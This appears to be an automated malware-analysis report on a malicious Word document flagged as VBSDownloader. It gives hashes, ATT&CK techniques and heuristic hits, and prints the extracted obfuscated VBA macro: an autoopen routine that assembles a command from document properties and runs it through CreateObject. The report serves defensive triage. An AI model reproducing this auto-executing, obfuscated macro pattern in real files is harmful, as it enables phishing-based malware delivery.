VBSDownloader — Office (OLE) malware analysis

Static analysis result for SHA-256 31e3fc47f0846cce…

MALICIOUS

Office (OLE)

Size: 76.5 KB
Created: 2017-08-23 10:15:00
Authoring application: Microsoft Office Word
First seen: 2017-09-14
MD5: 90f93a037983ecfbd69c6706931dc530
SHA-1: 4b797f845d8217a248b8571486fb4377b03501d1
SHA-256: 31e3fc47f0846cce98cedf0a6a8c1a8224b3350c26254982cc9786ec5c9982bc
Risk score: 192

Malware Insights

VBSDownloader · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. Heuristics indicate the presence of an auto-executing macro ('autoopen') that uses 'CreateObject' to likely download and execute a second-stage payload, as suggested by the ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0'. The VBA macro itself is heavily obfuscated, but its structure and the heuristic firings strongly suggest a downloader functionality.

Heuristics (8)

  • ClamAV: Doc.Macro.VBSDownloader-6336817-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
     hCmKFBfWmE = "yCwPaXvdBkA"
     CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0
    MEembHVxzx = "rupHwEnskFY"
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub autoopen()
    SEWfmEPmHBD
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10086 bytes
SHA-256: 958723df6a095070f80dc4d850123fa3f28636883d8934287e3d6ce8c8eb2780
Detection: ClamAV: No threats found
Obfuscation or payload: likely. 235 of 275 identifiers look randomly generated (e.g. 'UMKDLgDUKvd'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function UuWGcCKmm()
Dim kSdCGKtvftA()
TPZkbBcCd = 7693
ReDim kSdCGKtvftA(7693)
kSdCGKtvftA(4023) = YMgAfUPC
 kSdCGKtvftA(6846) = tskVCYKZ
 kSdCGKtvftA(4329) = 432
 kSdCGKtvftA(3548) = 5597
 kSdCGKtvftA(4625) = 5448
 kSdCGKtvftA(2176) = 4280
 For TPZkbBcCd = 3514 To 3656
kSdCGKtvftA(TPZkbBcCd) = TPZkbBcCd
Next
End Function
 
Function nnfGeycE()
Dim wHvWLyCCL()
DnExBHxRyfp = 8655
ReDim wHvWLyCCL(8655)
wHvWLyCCL(3795) = PzCMcVcgnh
 wHvWLyCCL(7209) = xztUgbFWDCL
 wHvWLyCCL(6882) = TRNmmsArVhW
 wHvWLyCCL(2806) = pbBHkrSdTMe
 wHvWLyCCL(2583) = 7295
 wHvWLyCCL(1945) = 5468
 wHvWLyCCL(738) = 9279
 wHvWLyCCL(4941) = 7633
 wHvWLyCCL(1137) = 3166
 wHvWLyCCL(1210) = 5447
 For DnExBHxRyfp = 5741 To 261
wHvWLyCCL(DnExBHxRyfp) = DnExBHxRyfp
Next
End Function
 
Function RZYYtdsM()
Dim LeHYbnYspZ()
sgNrVGUwG = 7163
ReDim LeHYbnYspZ(7163)
LeHYbnYspZ(6409) = SVvmkMBg
 LeHYbnYspZ(2948) = RdmThCHmTL
 LeHYbnYspZ(2082) = LdWNekGrLw
 LeHYbnYspZ(6783) = LsMsgBGyRb
 LeHYbnYspZ(7054) = WTFzMExVy
 LeHYbnYspZ(6152) = gsafKsLKTYr
 LeHYbnYspZ(5268) = 3291
 LeHYbnYspZ(346) = 278
 LeHYbnYspZ(487) = 6849
 For sgNrVGUwG = 6927 To 5687
LeHYbnYspZ(sgNrVGUwG) = sgNrVGUwG
Next
End Function
 
Function hZsSvuuLN()
Dim WbvUBcPhR()
DfVfApYTMpS = 5773
ReDim WbvUBcPhR(5773)
WbvUBcPhR(4737) = aeCevfdRve
 WbvUBcPhR(5411) = wsyYvTeT
 WbvUBcPhR(5427) = wpXgmMULn
 WbvUBcPhR(3091) = 384
 WbvUBcPhR(1600) = 9103
 WbvUBcPhR(2853) = 9593
 For DfVfApYTMpS = 3128 To 410
WbvUBcPhR(DfVfApYTMpS) = DfVfApYTMpS
Next
End Function
 
Function HeeUEhda()
Dim SkCRBzTNKkZ()
rGPpRNaR = 6882
ReDim SkCRBzTNKkZ(6882)
SkCRBzTNKkZ(1649) = fvtEMUAruuY
 SkCRBzTNKkZ(1977) = gSSheHkUPD
 SkCRBzTNKkZ(3057) = RHmhhTzWPKr
 SkCRBzTNKkZ(1459) = 8296
 SkCRBzTNKkZ(2652) = 1995
 For rGPpRNaR = 3667 To 1519
SkCRBzTNKkZ(rGPpRNaR) = rGPpRNaR
Next
End Function
 
Function bsEWmzMcdBe()
Dim CvXcKFfE()
xZARnFmnKK = 9349
ReDim CvXcKFfE(9349)
CvXcKFfE(1894) = tzheUEHKB
 CvXcKFfE(9226) = eEFPAmvs
 CvXcKFfE(7353) = fyTuKpgs
 CvXcKFfE(1583) = APhvZMFa
 CvXcKFfE(3344) = hSxwwPdFEMr
 CvXcKFfE(4620) = 4269
 CvXcKFfE(6711) = 8144
 CvXcKFfE(6355) = 4741
 CvXcKFfE(6902) = 5694
 CvXcKFfE(5980) = 167
 CvXcKFfE(5369) = 6975
 For xZARnFmnKK = 9298 To 1013
CvXcKFfE(xZARnFmnKK) = xZARnFmnKK
Next
End Function
 
Function zNpvdYtuxWc()
Dim pNDdndaTme()
uKtRmAEVPeB = 665
ReDim pNDdndaTme(665)
pNDdndaTme(109) = KtxVVDXX
 pNDdndaTme(222) = LrLKszrX
 pNDdndaTme(582) = PzGLGcxAa
 pNDdndaTme(458) = PWenwNyU
 pNDdndaTme(280) = 5113
 pNDdndaTme(193) = 8710
 pNDdndaTme(630) = 7182
 pNDdndaTme(605) = 6362
 pNDdndaTme(587) = 4716
 pNDdndaTme(227) = 7107
 For uKtRmAEVPeB = 561 To 174
pNDdndaTme(uKtRmAEVPeB) = uKtRmAEVPeB
Next
End Function
 
Function vcvVFmHrhmB()
Dim nVbNtczP()
mhDyWwhahX = 6402
ReDim nVbNtczP(6402)
nVbNtczP(4696) = CkzygCgDzZb
 nVbNtczP(1875) = zWKnYBByaWs
 nVbNtczP(1550) = kLTBAXEWszx
 nVbNtczP(5133) = 7583
 nVbNtczP(5891) = 8940
 nVbNtczP(4413) = 2627
 nVbNtczP(6249) = 3938
 nVbNtczP(2793) = 9756
 For mhDyWwhahX = 2505 To 5149
nVbNtczP(mhDyWwhahX) = mhDyWwhahX
Next
End Function
 
Function eGWaDsAyChp()
Dim hzZYGBpHP()
NMWcebCs = 4857
ReDim hzZYGBpHP(4857)
hzZYGBpHP(2256) = VsXBYryVaSF
 hzZYGBpHP(2623) = fzLswewUWF
 hzZYGBpHP(3235) = AtWvtbUkWxf
 hzZYGBpHP(1792) = yvVETnsctaW
 hzZYGBpHP(1580) = nMwxXYRxB
 hzZYGBpHP(2536) = 3693
 hzZYGBpHP(102) = 5824
 hzZYGBpHP(2209) = 4767
 hzZYGBpHP(3984) = 1537
 hzZYGBpHP(2028) = 2006
 hzZYGBpHP(3499) = 5860
 For NMWcebCs = 4007 To 2149
hzZYGBpHP(NMWcebCs) = NMWcebCs
Next
End Function

Sub autoopen()
SEWfmEPmHBD
End Sub
Public Function GGeYpdzkeM(fBdFXvMtWT)
hTZSUBMTAp = "sGsbdLrufp"
 etpVGVum = "mETgKbgsHUe"
 RbuVtvzvn = "bHHAUnMrXF"
 sGLckvMGP = "rBVUkYByC"
 wtfFFppf = "uFveWEEEaY"
 epuRGHUUy = "XrtpPEBA"
 BEptVXeVF = "WmWccFVD"
 RFWVXGGk = "WuAcsYwfLk"
 GGeYpdzkeM = ActiveDocument.CustomDocumentProperties(fBdFXvMtWT) + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + fAFfTtLxGWk
pGbUGMfsW = "GsGLRHSZF"
 aFghZswaEER = "GmCnPwLCyeX"
 pTbhZFbtdk = "FYCKbrgUkR"
 wrTCDkNVL = "ksPMFZzVSv"
 ddsGyCeGCy = "gmTYWTbcK"
 VrcpSuxkS = "RzGpHkrdTvW"
 EVvySgLv = "YMzaDpeArN"
 WNzYVGXkpb = "MTrKbHsu"
 End Function
Public Function yWfzXCLRL()
mKVetctGMYn = "yrKYdwEpzf"
 wsPdXayTZRw = "TDDgmTTyRx"
 bDPkHxMmhZ = "uMcTbpnk"
 NYDBXAXVeyM = "TESuhLABY"
 mPhwykaRdnT = GGeYpdzkeM("pVesNMDD") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + GGeYpdzkeM("dNWBxeLpvh") + GGeYpdzkeM("CpGEXgyr") + GGeYpdzkeM("aLVULngBk")
sFnZRZPcH = "PDbZUMVXHt"
 EASVYTff = "LwZMCcPwzKr"
 pGNgeMpZKDC = "pfVfhKYYar"
 wVutHFFGf = "MGeCRRmVY"
 vUHWEKHTFgR = "dYXSfeKPyhP"

bBWBsxvZC = GGeYpdzkeM("wFvScDNrcD") + GGeYpdzkeM("NYYUbSvw") + GGeYpdzkeM("HmgKxtsXwWn") + GGeYpdzkeM("rxNWFLuZNW") + GGeYpdzkeM("fLgpEEPySWS")
zCxWFrktb = bBWBsxvZC + mPhwykaRdnT
SUYXaKFEUuW = "MSTnMrBu"
 kKZgRMfZfU = "hWYzZzxYG"
 EAfvZZTzZZc = "RfevhmkpG"
 kDXxBakP = "FMAfwvcMZ"
 bypkzXrdVG = "kyKpzZuu"
 cxKFcMZBw = "bkzKKuWegtf"
 swBKwKeaG = "bDkeumaG"
 yWfzXCLRL = zCxWFrktb + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function DGVuXEDvC()
DGVuXEDvC = GGeYpdzkeM("yNNaEaEaNwC") + GGeYpdzkeM("WkZhErcT") + GGeYpdzkeM("eXnFgAWpc") + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + LFCMtdME
ybtCwxsYME = "dwvYYCNkwH"
 VPtAHYYE = "eDukLMCZ"
 HLnDkgEB = "LKWRytBKLr"
 gHubZGfS = "SRaEWtypnc"
 KETmkAzVKG = "NhSeLKsVgb"
 rWxTmwpdyxY = "UMKDLgDUKvd"
 GtnsxVnwwWz = "myrkrBZyf"
 nxewRZDYvc = "LNzEbhvez"
 End Function
Public Function SEWfmEPmHBD()
GfutSEbC = "WLAgFBWXS"
 hCmKFBfWmE = "yCwPaXvdBkA"
 CreateObject(DGVuXEDvC + GGeYpdzkeM("nydmPfzx") + GGeYpdzkeM("drcbPKyTuXc")).Run$ yWfzXCLRL + cxPabABMcr + bTFXznUbtc + fYDrYUnsPW + pKrXrHXYXEW + PVLbswKckfa, 0
MEembHVxzx = "rupHwEnskFY"
 KpeGBCCgUK = "nMRgtsuC"
 XgyNuUwXDHc = "DEmanafDgp"
 wmGykMxYtaX = "GfbhYMeU"
 kDVzduac = "GrByEmpbpck"
 nbYSaWpPm = "XAPTCMSeYA"
 bnfHpKELGK = "RxnUsradM"
 GpZFzNEbX = "NDVYKYmLzgM"
 End Function

Function EkWGTpmUsXR()
Dim XgvwtwGkp()
GhfLaHkTgus = 3246
ReDim XgvwtwGkp(3246)
XgvwtwGkp(2395) = UNEspXYY
 XgvwtwGkp(654) = UpCTgvecf
 XgvwtwGkp(2967) = WRmrtbDs
 XgvwtwGkp(1343) = nSruxddRGPx
 XgvwtwGkp(273) = vCLPuXNp
 XgvwtwGkp(1449) = 7419
 XgvwtwGkp(3080) = 2346
 XgvwtwGkp(1852) = 8347
 XgvwtwGkp(2841) = 3943
 XgvwtwGkp(1911) = 7688
 XgvwtwGkp(3036) = 1371
 For GhfLaHkTgus = 2645 To 214
XgvwtwGkp(GhfLaHkTgus) = GhfLaHkTgus
Next
End Function
 
Function hdXSENYcU()
Dim zKwScAKM()
LTGugrSXf = 8982
ReDim zKwScAKM(8982)
zKwScAKM(4706) = FAnLpFWpCLC
 zKwScAKM(4294) = wPwvHEEZpV
 zKwScAKM(8189) = ZWwRgvAExG
 zKwScAKM(1571) = GAtpWWVc
 zKwScAKM(8382) = 8495
 zKwScAKM(6757) = 7115
 For LTGugrSXf = 3055 To 8866
zKwScAKM(LTGugrSXf) = LTGugrSXf
Next
End Function
 
Function ZztYaWcC()
Dim WUVbNddg()
BtFmVMSZwLm = 9622
ReDim WUVbNddg(9622)
WUVbNddg(7816) = eKxWATFh
 WUVbNddg(6799) = ZKHVsvvP
 WUVbNddg(270) = 6448
 WUVbNddg(7474) = 1367
 For BtFmVMSZwLm = 4073 To 6257
WUVbNddg(BtFmVMSZwLm) = BtFmVMSZwLm
Next
End Function
 
Function XrcPySkKE()
Dim CPhcUGXuTZx()
vNVdMHTYbY = 7775
ReDim CPhcUGXuTZx(7775)
CPhcUGXuTZx(1299) = HKzBzRLn
 CPhcUGXuTZx(3827) = bpgvSXXW
 CPhcUGXuTZx(671) = cWBPpkcDSyt
 CPhcUGXuTZx(3438) = hfvVwdNuHN
 CPhcUGXuTZx(7210) = hemPwEdRd
 CPhcUGXuTZx(1480) = 4486
 CPhcUGXuTZx(3056) = 9935
 CPhcUGXuTZx(4716) = 2964
 CPhcUGXuTZx(2311) = 6556
 CPhcUGXuTZx(4191) = 6614
 CPhcUGXuTZx(1281) = 5481
 For vNVdMHTYbY = 586 To 7250
CPhcUGXuTZx(vNVdMHTYbY) = vNVdMHTYbY
Next
End Function
 
Function FAfkgkZX()
Dim GLvUdNmBx()
tvagCGmBbhW = 2152
ReDim GLvUdNmBx(2152)
GLvUdNmBx(1217) = nHKzetXvs
 GLvUdNmBx(1669) = gASccAAAkbX
 GLvUdNmBx(2083) = CCdnLLVDt
 GLvUdNmBx(511) = ncpkGKnk
 GLvUdNmBx(1751) = PGWVuLAMC
 GLvUdNmBx(1432) = BfSzSfSSns
 GLvUdNmBx(2141) = 8278
 GLvUdNmBx(528) = 7989
 GLvUdNmBx(2083) = 3819
 GLvUdNmBx(75) = 2190
 GLvUdNmBx(910) = 1218
 For tvagCGmBbhW = 1608 To 230
GLvUdNmBx(tvagCGmBbhW) = tvagCGmBbhW
Next
End Function
 
Function nbXrebyaC()
Dim sAebgYCbs()
XVFzPNRuCa = 2298
ReDim sAebgYCbs(2298)
sAebgYCbs(2159) = FUtamvXSFW
 sAebgYCbs(1080) = LakeNvfEw
 sAebgYCbs(255) = MXxUTAkSSF
 sAebgYCbs(1978) = yMStUdAX
 sAebgYCbs(193) = rmKrzgMszu
 sAebgYCbs(1477) = 7362
 sAebgYCbs(1983) = 985
 sAebgYCbs(1896) = 2666
 sAebgYCbs(873) = 3357
 sAebgYCbs(1198) = 2412
 For XVFzPNRuCa = 584 To 2101
sAebgYCbs(XVFzPNRuCa) = XVFzPNRuCa
Next
End Function
 
Function sKekEVXvLv()
Dim adrcTyWDU()
bfnDemYRp = 8138
ReDim adrcTyWDU(8138)
adrcTyWDU(2610) = mLapvgwVs
 adrcTyWDU(4920) = fuPVrdUybX
 adrcTyWDU(574) = WyzRKZTy
 adrcTyWDU(6078) = wLwAaNCarF
 adrcTyWDU(3191) = 6052
 adrcTyWDU(992) = 192
 adrcTyWDU(3840) = 9929
 adrcTyWDU(5318) = 7084
 adrcTyWDU(2567) = 9669
 For bfnDemYRp = 6497 To 6377
adrcTyWDU(bfnDemYRp) = bfnDemYRp
Next
End Function
 
Function TDgzytVCRA()
Dim HVUAKyLg()
rhfZYSgHd = 3128
ReDim HVUAKyLg(3128)
HVUAKyLg(605) = HvnehNHWMAu
 HVUAKyLg(2491) = fCeBpDURfba
 HVUAKyLg(558) = 2588
 HVUAKyLg(1699) = 1794
 HVUAKyLg(692) = 9464
 For rhfZYSgHd = 2836 To 1514
HVUAKyLg(rhfZYSgHd) = rhfZYSgHd
Next
End Function
 
Function nbsVuhDwLPy()
Dim HEWPwSKcEDh()
wBdwXuvMC = 8919
ReDim HEWPwSKcEDh(8919)
HEWPwSKcEDh(6895) = XVdgbXgEp
 HEWPwSKcEDh(918) = HBXNZWbprd
 HEWPwSKcEDh(4160) = vMxnynby
 HEWPwSKcEDh(2434) = fNEaCnLrvw
 HEWPwSKcEDh(5411) = 7538
 HEWPwSKcEDh(512) = 8408
 HEWPwSKcEDh(2106) = 2488
 HEWPwSKcEDh(692) = 1794
 HEWPwSKcEDh(7110) = 4916
 HEWPwSKcEDh(573) = 4534
 For wBdwXuvMC = 383 To 899
HEWPwSKcEDh(wBdwXuvMC) = wBdwXuvMC
Next
End Function